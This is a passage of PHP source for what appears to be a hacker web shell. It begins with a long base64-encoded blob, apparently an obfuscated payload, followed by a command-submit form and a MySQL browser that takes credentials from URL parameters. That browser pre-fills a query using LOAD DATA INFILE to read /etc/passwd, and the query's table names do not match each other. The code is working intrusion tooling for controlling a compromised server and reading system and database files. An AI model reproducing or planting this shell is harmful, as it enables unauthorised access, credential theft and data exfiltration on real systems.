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'))); ?></textarea>
  780. </td>
  781. </tr>
  782. <tr>
  783. <td>
  784.                         <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" />
  785.                             </td>
  786.                 </tr>
  787.             </table>
  788.             </form>
  789.             <?php
  790.                 }
  791.         elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql'))
  792.                 {
  793.                     if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport']))
  794.                             {
  795.                             $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];    
  796.                             if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass))
  797.                                 {
  798.                                 $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
  799.                                 $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
  800.                                 $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;
  801.                                 sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  802.                                 sqlpass=".$sqlpass."&amp;
  803.                                 sqlport=".$sqlport."&amp;\">[ databases ]</a>";
  804.                                 if(isset($_GET['db']))
  805.                                     $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;
  806.                                     <a href=\"y=".$pwd."&amp;x=mysql&amp;
  807.                                     sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  808.                                     sqlpass=".$sqlpass."&amp;
  809.                                     sqlport=".$sqlport."&amp;
  810.                                     db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
  811.                                 if(isset($_GET['table']))
  812.                                     $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;
  813.                                     </span>&nbsp;&nbsp;
  814.                                     <a href=\"y=".$pwd."&amp;x=mysql&amp;
  815.                                     sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  816.                                     sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;
  817.                                     db=".$_GET['db']."&amp;
  818.                                     table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
  819.                                     $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
  820.                                     $msg .= "</div>";
  821.                                     echo $msg;
  822.                                 if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery'])))
  823.                             {
  824.                             $db = $_GET['db'];
  825.                                     $query = "DROP TABLE IF EXISTS Newbie3viLc063s0_table;
  826.                                     \nCREATE TABLE `Newbie3viLc063s0_table` ( `file` LONGBLOB NOT NULL );
  827.                                     \nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE Z3r0Z3r0_table;SELECT * FROM Newbie3viLc063s0_table;
  828.                                     \nDROP TABLE IF EXISTS Newbie3viLc063s0_table;";
  829.                                     $msg = "<div style=\"width:99%;padding:0 10px;\">
  830.                                     <form action=\"?\" method=\"get\">
  831.                                         <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  832.                                         <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  833.                                         <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  834.                                         <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  835.                                         <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  836.                                         <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  837.                                         <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  838.                                         <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p>
  839.                                         <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  840.                                     </form>
  841.                                 </div> ";
  842.                                         $tables = array();
  843.                                         $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>";
  844.                                         $hasil = @mysql_list_tables($db,$con);
  845.                             while(list($table) = @mysql_fetch_row($hasil))
  846.                                 { @array_push($tables,$table); }
  847.                             @sort($tables);
  848.                             foreach($tables as $table)
  849.                                 {
  850.                                 $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>";
  851.                                 }
  852.                             $msg .= "</table>";
  853.                             }
  854.                         elseif(isset($_GET['table']) && (!isset($_GET['sqlquery'])))
  855.                             {
  856.                             $db = $_GET['db'];
  857.                             $table = $_GET['table'];
  858.                             $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";
  859.                             $msgq = "<div style=\"width:99%;padding:0 10px;\">
  860.                                     <form action=\"?\" method=\"get\">
  861.                                         <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  862.                                         <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  863.                                         <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  864.                                         <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  865.                                         <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  866.                                         <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  867.                                         <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
